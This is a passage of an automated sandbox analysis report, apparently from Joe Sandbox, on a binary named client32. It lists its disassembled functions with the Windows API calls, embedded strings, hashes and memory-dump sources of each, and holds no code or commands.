                                                                                                                                                                                • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                                                                                                                • Opcode Fuzzy Hash: b260747c8f968527a83576dee86365f6f35b5e17a707623b7f74d3e93623c211
                                                                                                                                                                                • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                                                                                                                Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,2520CF5D,00000001,?,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,?,?), ref: 1110708D
                                                                                                                                                                                  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11138283
                                                                                                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,?,?), ref: 111070DF
                                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,?,?), ref: 11107116
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11026322
                                                                                                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,1110809F), ref: 11107446
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110809F), ref: 11107360
                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110809F), ref: 1110738F
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,1110809F), ref: 1110743F
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_strrchr
                                                                                                                                                                                • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                                                                                                                • API String ID: 2763610866-2591373181
                                                                                                                                                                                • Opcode ID: 3632b3966721e3549bb3aa52b3f5913f49e3be0f8095af9e13dc67f167ab9f1e
                                                                                                                                                                                • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                                                                                                                • Opcode Fuzzy Hash: 3632b3966721e3549bb3aa52b3f5913f49e3be0f8095af9e13dc67f167ab9f1e
                                                                                                                                                                                • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                                                                                                                Function 1111D040 Relevance: 37.2, APIs: 13, Strings: 8, Instructions: 418windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1110FC40: EnterCriticalSection.KERNEL32(?), ref: 1110FD83
                                                                                                                                                                                  • Part of subcall function 11153570: _memmove.LIBCMT ref: 111535AC
                                                                                                                                                                                • wsprintfA.USER32 ref: 1111D30E
                                                                                                                                                                                • wsprintfA.USER32 ref: 1111D437
                                                                                                                                                                                • _free.LIBCMT ref: 1111D466
                                                                                                                                                                                • _free.LIBCMT ref: 1111D4E0
                                                                                                                                                                                  • Part of subcall function 11153730: GetDC.USER32(00000000), ref: 11153763
                                                                                                                                                                                  • Part of subcall function 11153730: CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                                                                                                                  • Part of subcall function 11153730: SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                                                                                                                  • Part of subcall function 11153730: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                                                                                                                  • Part of subcall function 11153730: SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1111D524
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1111D532
                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 1111D55A
                                                                                                                                                                                • _free.LIBCMT ref: 1111D279
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1111D585
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1111D5C9
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1111D5D7
                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 1111D62E
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111D63B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$Select$CreateDelete_freewsprintf$CompatibleErrorLastSection$CriticalEnterExitMessagePaletteProcess_memmove
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$DoNewScrape$Error deleting hbmp, e=%d$Error. Unknown colordepth %d for newscrape$Error. b4cvt dst=%p, start=%p, end=%p$Error. cvt overflow dst=%p, start=%p, end=%p$cbUnpacked <= cbMax$workdc
                                                                                                                                                                                • API String ID: 4222719901-1853163823
                                                                                                                                                                                • Opcode ID: 0532fe69a7210bf5a7927536811323a8ec88e1e7b8175fb62eb83e1a8f077ec4
                                                                                                                                                                                • Instruction ID: 2b9f63541b4d259c9eba475547952ab502fd0fc1a2c7f637f53db9b2787f3cd1
                                                                                                                                                                                • Opcode Fuzzy Hash: 0532fe69a7210bf5a7927536811323a8ec88e1e7b8175fb62eb83e1a8f077ec4
                                                                                                                                                                                • Instruction Fuzzy Hash: BAF192B1A002169FEB24DB74CD84FDEF7B9AB44304F4485A9E55EAB244D734AE80CF61
                                                                                                                                                                                Function 11065170 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 144libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExA.KERNEL32(?), ref: 110651A7
                                                                                                                                                                                • LoadLibraryA.KERNEL32(netapi32.dll), ref: 110651DF
                                                                                                                                                                                  • Part of subcall function 11064ED0: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 11064EFA
                                                                                                                                                                                  • Part of subcall function 11064ED0: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 11064F28
                                                                                                                                                                                  • Part of subcall function 11064ED0: wsprintfA.USER32 ref: 11064F63
                                                                                                                                                                                  • Part of subcall function 11064ED0: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 11064F81
                                                                                                                                                                                  • Part of subcall function 11064ED0: CloseHandle.KERNEL32(00000000), ref: 11064F8F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileName$CloseCreateHandleLibraryLoadModulePathShortVersionwsprintf
                                                                                                                                                                                • String ID: Info: GetDomain took %d ms$Info: waiting for lanmanworkstation to start (%d)$NetApiBufferFree$NetWkstaGetInfo$lanmanworkstation$netapi32.dll
                                                                                                                                                                                • API String ID: 4150433693-3437813488
                                                                                                                                                                                • Opcode ID: 3fd95b775740dd09cc1a47ee1cc729a5bc81c1f8c1e1321a63da6277465a7021
                                                                                                                                                                                • Instruction ID: 299bd3089ece960b3047d49bf2f5e62e33cdf64d2636cd91c1eb5929df3b4e75
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fd95b775740dd09cc1a47ee1cc729a5bc81c1f8c1e1321a63da6277465a7021
                                                                                                                                                                                • Instruction Fuzzy Hash: B241DD35E00229ABDB24CFA4DC84B9EB7B9EF46309F0040A9F91DA7640DB715A40CF92
                                                                                                                                                                                Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                                                                                                                • GdiFlush.GDI32 ref: 1105D35C
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                                                                                                                • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                                                                                                                • API String ID: 652520247-4094952007
                                                                                                                                                                                • Opcode ID: 36acbf8a61bd15a4bc67f76e8ea88024ec33bde48df66652774c1eef87bb546b
                                                                                                                                                                                • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                                                                                                                • Opcode Fuzzy Hash: 36acbf8a61bd15a4bc67f76e8ea88024ec33bde48df66652774c1eef87bb546b
                                                                                                                                                                                • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                                                                                                                Function 11119650 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 404windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetParent.USER32(?), ref: 111196B4
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 111196CB
                                                                                                                                                                                • IsZoomed.USER32(?), ref: 11119752
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 111197A8
                                                                                                                                                                                • GetSystemMetrics.USER32(00000050), ref: 11119829
                                                                                                                                                                                • GetSystemMetrics.USER32(00000020), ref: 11119899
                                                                                                                                                                                • GetSystemMetrics.USER32(00000021), ref: 111198A1
                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 111198A9
                                                                                                                                                                                • GetMenu.USER32(?), ref: 111198BB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MetricsSystem$RectWindow$MenuParentZoomed
                                                                                                                                                                                • String ID: OpenMaxSize$OpenOnScreen$View
                                                                                                                                                                                • API String ID: 644408245-3408940913
                                                                                                                                                                                • Opcode ID: c80d8883dce85faa34919b812ed579820cb0c731f13d583622df69adf5dc8cbd
                                                                                                                                                                                • Instruction ID: 1e98b6d965d6346ca6415140ca8d1fa1c35b468b675221a1320d0953db32dc7a
                                                                                                                                                                                • Opcode Fuzzy Hash: c80d8883dce85faa34919b812ed579820cb0c731f13d583622df69adf5dc8cbd
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E023075E4162E9FDB15CF74CA84BDDF7B6BB04704F004169E829AB244E774A980CF94
                                                                                                                                                                                Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EDB88,?,?,00020019,2520CF5D), ref: 110ED53C
                                                                                                                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,2520CF5D), ref: 110ED1CB
                                                                                                                                                                                • wsprintfA.USER32 ref: 1102B84D
                                                                                                                                                                                  • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                                                                                                                                • wsprintfA.USER32 ref: 1102B69E
                                                                                                                                                                                • wsprintfA.USER32 ref: 1102B705
                                                                                                                                                                                  • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$Time$EnumFileInfoOpenQuerySystem
                                                                                                                                                                                • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                                                                                                                                • API String ID: 4031771014-120756110
                                                                                                                                                                                • Opcode ID: 684074a1e14e037f2d526b40ea2220906d05e1cdf99bbafc3f5acbf2f588c809
                                                                                                                                                                                • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                                                                                                                                • Opcode Fuzzy Hash: 684074a1e14e037f2d526b40ea2220906d05e1cdf99bbafc3f5acbf2f588c809
                                                                                                                                                                                • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                                                                                                                Function 1113B660 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
